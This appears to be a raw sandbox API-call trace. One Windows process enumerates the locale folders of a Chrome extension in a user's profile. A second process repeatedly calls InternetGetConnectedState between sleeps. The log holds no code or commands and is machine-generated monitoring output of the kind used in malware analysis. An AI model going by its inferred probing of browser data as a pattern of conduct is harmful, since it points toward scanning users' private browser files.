| 07:44:10,960 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xa1\x85j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01`\xa1\x85j\xe0\x91\xcf\x01`\xa1\x85j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\xa1\x85j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xf6\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:10,960 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:10,960 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,040 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\bg\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:11,040 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90(\x87j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01\x90(\x87j\xe0\x91\xcf\x01\x90(\x87j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90(\x87j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\x08\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:11,040 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:11,040 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,120 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\ca\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:11,120 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90(\x87j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01\xc0\xaf\x88j\xe0\x91\xcf\x01\xc0\xaf\x88j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xaf\x88j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xcf\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:11,120 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:11,120 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,140 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:11,140 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:11,140 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:11,140 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:11,140 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:11,201 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\cs\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:11,201 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\xaf\x88j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01\xf06\x8aj\xe0\x91\xcf\x01\xf06\x8aj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf06\x8aj\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xde\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:11,201 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:11,201 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,281 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\da\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:11,281 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf06\x8aj\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01\xf06\x8aj\xe0\x91\xcf\x01\xf06\x8aj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf06\x8aj\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xd8\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:11,281 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:11,281 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,361 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\de\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:11,361 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \xbe\x8bj\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01 \xbe\x8bj\xe0\x91\xcf\x01 \xbe\x8bj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \xbe\x8bj\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xd9\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:11,361 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:11,361 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,441 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\el\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:11,441 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \xbe\x8bj\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01 \xbe\x8bj\xe0\x91\xcf\x01 \xbe\x8bj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \xbe\x8bj\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\x04\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:11,441 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:11,441 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,521 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\en_GB\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:11,521 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00PE\x8dj\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01\x80\xcc\x8ej\xe0\x91\xcf\x01\x80\xcc\x8ej\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xcc\x8ej\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xd0\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:11,521 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:11,521 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,601 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\en_US\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:11,601 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0S\x90j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01\xb0S\x90j\xe0\x91\xcf\x01\xb0S\x90j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0S\x90j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xd1\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:11,601 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:11,601 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,681 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\es\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:11,681 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\xda\x91j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01\xe0\xda\x91j\xe0\x91\xcf\x01\xe0\xda\x91j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xda\x91j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xce\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:11,681 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:11,681 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,761 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\es_419\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:11,761 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10b\x93j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01\x10b\x93j\xe0\x91\xcf\x01\x10b\x93j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10b\x93j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xce\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:11,761 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:11,761 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,841 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\et\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:11,841 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\xe9\x94j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01`\x14\x9ej\xe0\x91\xcf\x01`\x14\x9ej\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x14\x9ej\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xd8\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:11,841 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:11,841 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:11,952 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:11,952 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:11,972 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:11,972 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:11,972 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:12,062 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\fi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:12,072 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00 1\xa4j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01 1\xa4j\xe0\x91\xcf\x01 1\xa4j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 1\xa4j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xd8\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,072 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,072 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:12,152 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\fil\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:12,152 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00 1\xa4j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01P\xb8\xa5j\xe0\x91\xcf\x01P\xb8\xa5j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\xb8\xa5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xdb\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,152 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,152 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:12,232 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\fr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:12,232 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xb8\xa5j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01P\xb8\xa5j\xe0\x91\xcf\x01P\xb8\xa5j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\xb8\xa5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xd7\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:12,232 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:12,232 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:12,312 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\he\*.* |
SUCCESS | 0x001734c0 | |
